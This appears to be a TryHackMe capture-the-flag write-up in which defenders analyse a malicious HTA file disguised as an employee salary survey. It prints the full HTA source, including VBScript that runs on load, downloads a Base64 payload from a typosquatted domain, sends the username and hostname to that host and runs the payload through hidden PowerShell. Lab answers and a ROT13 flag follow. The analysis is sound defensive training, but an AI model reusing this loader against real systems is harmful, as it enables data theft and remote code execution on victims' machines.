Access the room: https://tryhackme.com/room/htapowershell-aoc2025-p2l5k8j1h4
.png)
And in our kingdom of Wareville, just like in others, thousands of files of all kinds pass through the systems every day, from DOCX, PDF resumes received by our elves, to financial spreadsheets, CSVs from the accounting department, and executable files launched by different applications. But have you ever wondered which of these might be malicious? Which ones could actually belong to King Malhare? An interesting question, isn’t it?
Learning Objectives
In this task, the TBFC SOC team will investigate one specific file type, the HTA format — a type often used for legitimate purposes, yet just as frequently exploited by attackers. Your mission is to reverse-engineer the HTA and uncover how King Malhare tricked Wareville’s elves. To do this, you will have to look for:
- Application metadata
- Script functions
- Any network calls or encoded data
- Clues about exfiltration
HTA Overview
In the summer of 2025, security researchers observed ransomware operators abusing a lesser known but powerful Windows file type: HTA (HTML Application) files. One such campaign delivered the Epsilon Red ransomware, disguised as fake verification or survey pages. This incident served as a reminder that not every threat arrives as an obvious executable — sometimes, it looks like a harmless internal tool.
In this TryHackMe challenge, we step into the role of defenders in Wareville, investigating how King Malhare’s minions used a fake salary survey to compromise multiple endpoints. The common artifact? Suspicious .hta file attached to an email.
What Is an HTA File?
An HTA (HTML Application) is essentially a desktop application built using web technologies:
- HTML for structure
- CSS for styling
- JavaScript or VBScript for logic
Unlike standard HTML pages that run inside a browser sandbox, HTA files execute via Microsoft HTML Application Host (mshta.exe), which grants them full user-level access to the Windows system.
This makes HTAs extremely flexible — and extremely dangerous.
Legitimate Uses of HTAs
HTAs were originally designed to help administrators and developers by enabling:
- Automation of setup or administrative tasks
- Lightweight internal tools
- Rapid prototyping without compiling software
- Simple IT support utilities
In other words, HTAs blend the simplicity of web development with the power of native Windows execution.
Unfortunately, attackers realized this power could be abused.
Why Attackers Abuse HTA Files
HTAs are attractive to attackers for several reasons:
- They execute using built-in Windows binaries (
mshta.exe) - They bypass some traditional application controls
- They can embed or download scripts dynamically
- They support VBScript, JavaScript, and PowerShell
- They are commonly trusted in corporate environments
Malicious HTAs are often used for:
- Initial access via phishing attachments
- Downloaders or droppers for second-stage payloads
- Obfuscation, using Base64 or layered scripts
- Living-off-the-land (LOLBins) attacks
A single HTA file can act as a launcher that pulls the real malware from an external server and executes it entirely in memory.
Step by step Malware Analysis
Safety Measures
The first rule when analyzing suspicious files is never double-click them.
In the TryHackMe AttackBox, we safely opened the file using a text editor:
pluma /root/Rooms/AoC2025/Day21/survey.hta
This ensures the file does not execute while we inspect it.
Here’s the complete code for the HTA file; make sure not to save it on your main system and instead use an attack box or virtual machine:
<!DOCTYPE html>
<html>
<head>
<title>Best Festival Company Developer Survey</title>
<hta:application id="APP123080"
applicationname="Festival Elf Survey"
icon="logo.ico"
border="thin"
caption="yes"
maximizebutton="no"
minimizebutton="no"
singleinstance="yes"
windowstate="normal"
sysmenu="yes">
</hta:application>
<script type="text/javascript">
function visited() {
document.getElementById("never").style.display = 'none';
document.getElementById("visited").style.display = 'block';
}
function never() {
document.getElementById("visited").style.display = 'none';
document.getElementById("never").style.display = 'block';
}
function submitted() {
document.getElementById("spinner").style.display = 'none';
document.getElementById("questions").style.display = 'none';
document.getElementById("thanks").style.display = 'block';
}
function submit() {
document.getElementById("submitbutton").style.display = 'none';
document.getElementById("spinner").style.display = 'inline';
setTimeout(submitted, 2000);
}
</script>
<script type="text/vbscript">
Sub Window_onLoad
Call getQuestions()
End Sub
Function getQuestions()
Dim IE, result, decoded, decodedString
Set IE = CreateObject("InternetExplorer.Application")
IE.navigate2 "http://survey.bestfestiivalcompany.com/survey_questions.txt"
Do While IE.ReadyState < 4
Loop
result = IE.document.body.innerText
IE.quit
decoded = decodeBase64(result)
decodedString = RSBinaryToString(decoded)
Call provideFeedback(decodedString)
End Function
Function provideFeedback(feedbackString)
Dim strHost, strUser, strDomain
On Error Resume Next
strHost = CreateObject("WScript.Network").ComputerName
strUser = CreateObject("WScript.Network").UserName
Dim IE
Set IE = CreateObject("InternetExplorer.Application")
IE.navigate2 "http://survey.bestfestiivalcompany.com/details?u=" & strUser & "?h=" & strHost
Do While IE.ReadyState < 4
Loop
IE.quit
Dim runObject
Set runObject = CreateObject("Wscript.Shell")
runObject.Run "powershell.exe -nop -w hidden -c " & feedbackString, 0, False
End Function
Function decodeBase64(base64)
dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.Text = base64
decodeBase64 = EL.NodeTypedValue
end function
Function RSBinaryToString(xBinary)
Dim Binary
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)
If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS.Open
RS.AddNew
RS("mBinary").AppendChunk Binary
RS.Update
RSBinaryToString = RS("mBinary")
Else
RSBinaryToString = ""
End If
End Function
</script>
<style>
body {
font-family: museo_sans,Arial,Helvetica,sans-serif;
overflow-x: hidden;
}
#header {
background-color: rgb(0, 153, 153);
box-shadow: rgba(0, 0, 0, .298039) 0 5px 0 0;
height: 150px;
width: 100%;
z-index: 1000;
margin-right: auto;
margin-left: auto;
}
#survey-content {
width: 100%;
max-width: 1100px;
z-index: 1000;
margin-right: auto;
margin-left: auto;
}
#topbar {
max-width: 500px;
float: left;
}
#logo {
margin-left 10%;
}
#survey {
margin-top: 5.0%;
margin-right: 20px;
padding-left: 10px;
padding-right: 10px;
background-color: rgb(0, 153, 153);
font-family: inherit;
font-size: 40px;
text-color: #F8F8F8;
font-weight: bold;
text-transform: uppercase;
text-decoration: none;
color: #FFFFFF;
float: right;
}
#survey-heading {
color: #FFFFFF;
font-family: 'Helvetica Neue', sans-serif;
font-weight: bold;
letter-spacing: -1px;
line-height: 1;
}
#hp {
float: right;
margin: -55% 65%;
}
#thanks {
overflow-x: hidden;
overflow-y: hidden;
}
</style>
</head>
<body>
<div id="header">
<div id="topbar">
<img id="logo" src="logo.png" alt="logo"></img>
</div>
<div id="survey">
<p id="survey-heading">Insert Survey Heading</p>
</div>
</div><br>
<div id="survey-content">
<h2>Anonymous Salary Feedback</h2>
<div id="questions">
<div>
<p> We are looking for your feedback to help us improve our employee relations and to invest in the future of our employees.This survey is completely anonymous and gives you to opportunity to express what you think about Best Festival Company's commitment to its employees. Please take five minutes to complete the following survey.</p>
</div>
<h3>How long have you been employed at Best Festival Company?</h3>
<label><input type="radio" name="q1"/> Less than 1 year</label><br />
<label><input type="radio" name="q1"/> Less than 2 years</label><br />
<label><input type="radio" name="q1"/> 2 years or more</label>
<h3>Do you feel valued at work?</h3>
<label><input type="radio" name="q2" />Yes</label><br />
<label><input type="radio" name="q2" />No</label><br />
<label><input type="radio" name="q2" />Indecisive</label>
<h3>Do you feel content with your current salary?</h3>
<label><input type="radio" name="q3" />Yes</label><br />
<label><input type="radio" name="q3" />No</label><br />
<label><input type="radio" name="q3" />Indecisive</label>
<h3>By how much do you believe your salary should increase?</h3>
<label><input type="radio" name="q4" />Up to 5%</label><br />
<label><input type="radio" name="q4" />Between 5% and 10%</label><br />
<label><input type="radio" name="q4" />Between 10% and 15%</label><br />
<label><input type="radio" name="q4" />More that 10%</label><br />
</div>
<input id="submitbutton" type="submit" value="Submit" style="background-color:rgb(0, 153, 153);border:none;border-radius:3px 3px 3px 3px;color:#FFFFFF;padding: 3px 20px;margin-top:25px; font-weight: bold" onMouseOver="this.style.backgroundColor='#ff9900'" onMouseOut="this.style.backgroundColor='#009999'" onclick="submit()" />
<img src="data:image/gif;base64,R0lGODlhEAAQAPQAAP///3d3d/r6+pSUlL29vXp6eouLi+jo6NDQ0IKCgrW1ta2trfDw8MfHx+Dg4J2dnaSkpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh/hpDcmVhdGVkIHdpdGggYWpheGxvYWQuaW5mbwAh+QQJCgAAACwAAAAAEAAQAAAFUCAgjmRpnqUwFGwhKoRgqq2YFMaRGjWA8AbZiIBbjQQ8AmmFUJEQhQGJhaKOrCksgEla+KIkYvC6SJKQOISoNSYdeIk1ayA8ExTyeR3F749CACH5BAkKAAAALAAAAAAQABAAAAVoICCKR9KMaCoaxeCoqEAkRX3AwMHWxQIIjJSAZWgUEgzBwCBAEQpMwIDwY1FHgwJCtOW2UDWYIDyqNVVkUbYr6CK+o2eUMKgWrqKhj0FrEM8jQQALPFA3MAc8CQSAMA5ZBjgqDQmHIyEAIfkECQoAAAAsAAAAABAAEAAABWAgII4j85Ao2hRIKgrEUBQJLaSHMe8zgQo6Q8sxS7RIhILhBkgumCTZsXkACBC+0cwF2GoLLoFXREDcDlkAojBICRaFLDCOQtQKjmsQSubtDFU/NXcDBHwkaw1cKQ8MiyEAIfkECQoAAAAsAAAAABAAEAAABVIgII5kaZ6AIJQCMRTFQKiDQx4GrBfGa4uCnAEhQuRgPwCBtwK+kCNFgjh6QlFYgGO7baJ2CxIioSDpwqNggWCGDVVGphly3BkOpXDrKfNm/4AhACH5BAkKAAAALAAAAAAQABAAAAVgICCOZGmeqEAMRTEQwskYbV0Yx7kYSIzQhtgoBxCKBDQCIOcoLBimRiFhSABYU5gIgW01pLUBYkRItAYAqrlhYiwKjiWAcDMWY8QjsCf4DewiBzQ2N1AmKlgvgCiMjSQhACH5BAkKAAAALAAAAAAQABAAAAVfICCOZGmeqEgUxUAIpkA0AMKyxkEiSZEIsJqhYAg+boUFSTAkiBiNHks3sg1ILAfBiS10gyqCg0UaFBCkwy3RYKiIYMAC+RAxiQgYsJdAjw5DN2gILzEEZgVcKYuMJiEAOwAAAAAAAAAAAA==" style="display:none" id="spinner" />
</div>
<div id="thanks" style="display:none">
<div id="survey-content">
<div>Thank you for your feedback!</div>
<div>All participants will be entered into a prize draw for a chance to win a trip to the South Pole!</div>
<input id="submitbutton" type="submit" value="Close" style="background-color:rgb(0, 153, 153);border:none;border-radius:3px 3px 3px 3px;color:#FFFFFF;padding: 3px 20px;margin-top:25px; font-weight: bold" onMouseOver="this.style.backgroundColor='#ff9900'" onMouseOut="this.style.backgroundColor='#009999'" onclick="self.close()" />
</div>
</div>
<div>
</div>
</body>
</html>Reviewing the HTA Metadata
We begin with the <head> section, which often reveals how attackers disguise their payload.
Key elements to inspect:
<title>– often impersonates legitimate tools (e.g., “Salary Survey”)<HTA:APPLICATION>– controls window behavior:- Hidden taskbar
- Minimized windows
- No borders or captions
Attackers frequently make malicious HTAs appear benign while hiding any visible interface.
Identifying Script Logic (VBScript)
The real behavior of an HTA lives inside the script block:
<script type="text/vbscript">Within this file, we identified five VBScript functions:
Functions Observed
window_onLoad: Automatically executes when the HTA opens then it calls thegetQuestions()function.getQuestions(): It makes external network requests, decodes Base64 content and passes decoded data toprovideFeedback()function.provideFeedback(feedbackString): Collects system information, makes additional external connections, Executes decoded contentdecodeBase64(base64): Converts Base64-encoded data into binaryRSBinaryToString(xBinary): Converts binary data back into readable strings
This structure is a major red flag. Legitimate survey tools do not typically decode Base64 data and execute it dynamically.
Dangerous Windows Objects
We next look for calls to CreateObject(), which often signal interaction with the operating system.
Notable objects found:
InternetExplorer.Application: Used to make outbound HTTP requestsWScript.Network: Collects hostnames, usernames, and domain dataWScript.Shell: Executes system commands and scripts
These objects together indicate:
- Data exfiltration
- System reconnaissance
- Command execution
Encoded Payloads and Base64 Analysis
Inside the script, we encounter Base64-encoded strings. This is a classic obfuscation technique.
Attackers use Base64 to:
- Hide URLs
- Conceal PowerShell commands
- Evade basic string-based detection
Using a tool like CyberChef, we decode the Base64 content and reveal:
- A remote URL hosted on the attacker’s infrastructure
- Content that is fetched dynamically at runtime
The decoded logic follows a familiar pattern:
$U– Stores the decoded URL$C– Downloads the content from the URL$B– Converts the content into an executable scriptblock
This means code is being downloaded and executed directly in memory, a strong indicator of malicious intent.
What the User Sees
Finally, we inspect the <body> section of the HTA.
This is what the victim actually interacts with.
In this case:
- The interface mimics a legitimate salary survey
- Input fields and buttons provide social engineering cover
- Meanwhile, malicious code executes in the background on load
The user believes they are submitting survey feedback — while the HTA silently performs reconnaissance and payload execution.
Final Verdict: What Did the HTA Do?
This HTA file:
- Masquerades as a legitimate salary survey
- Executes automatically on open
- Collects system and user information
- Downloads additional malicious content from a remote server
- Executes that content in memory using PowerShell/VBScript
In short, it acts as a malicious loader, providing initial access for further compromise.
Lab Answers
What is the title of the HTA application?
Best Festival Company Developer Survey.
What VBScript function is acting as if it is downloading the survey questions?
getQuestions().
What URL domain (including sub-domain) is the “questions” being downloaded from?
survey.bestfestiivalcompany.com.
Malhare seems to be using typosquatting, domains that look the same as the real one, in an attempt to hide the fact that the domain is not the inteded one, what character in the domain gives this away?
i.
Malicious HTAs often include real-looking data, like survey questions, to make the file seem authentic. How many questions does the survey have?
4.
Notice how even in code, social engineering persists, fake incentives like contests or trips hide in plain sight to build trust. The survey entices participation by promising a chance to win a trip to where?
South Pole.
The HTA is enumerating information from the local host executing the application. What two pieces of information about the computer it is running on are being exfiltrated? You should provide the two object names separated by commas.
ComputerName,UserName.
What endpoint is the enumerated data being exfiltrated to?
/details.
What HTTP method is being used to exfiltrate the data?
GET.
Since there’s no POST body, no headers, and no form submissions, it suggests that the function is using the GET method to exfiltrate the data.
After reviewing the function intended to get the survey questions, it seems that the data from the download of the questions is actually being executed. What is the line of code that executes the contents of the download?
runObject.Run “powershell.exe -nop -w hidden -c “ & feedbackString, 0, False.
It seems as if the malware site has been taken down, so we cannot download the contents that the malware was executing. Fortunately, one of the elves created a copy when the site was still active. Download the contents from here. What popular encoding scheme was used in an attempt to obfuscate the download?
base64.
Decode the payload. It seems as if additional steps where taken to hide the malware! What common encryption scheme was used in the script?
ROT13.
function AABB {
[CmdletBinding()]
param(
[Parameter(Mandatory)]
[string]$Text
)
$sb = New-Object System.Text.StringBuilder $Text.Length
foreach ($ch in $Text.ToCharArray()) {
$c = [int][char]$ch
if ($c -ge 65 -and $c -le 90) {
$c = (($c - 65 + 13) % 26) + 65
}
elseif ($c -ge 97 -and $c -le 122) {
$c = (($c - 97 + 13) % 26) + 97
}
[void]$sb.Append([char]$c)
}
$sb.ToString()
}
$flag = 'GUZ{Znyjner.Nanylfrq}'
$deco = AABB -Text $flag
Write-Output $decoThe script uses ROT13, a simple substitution cipher where each alphabetical character is rotated 13 positions forward in the alphabet. Uppercase and lowercase letters are processed separately, while non-alphabetic characters remain unchanged.
Either run the script or decrypt the flag value using online tools such as CyberChef. What is the flag value?
THM{Malware.Analysed}.
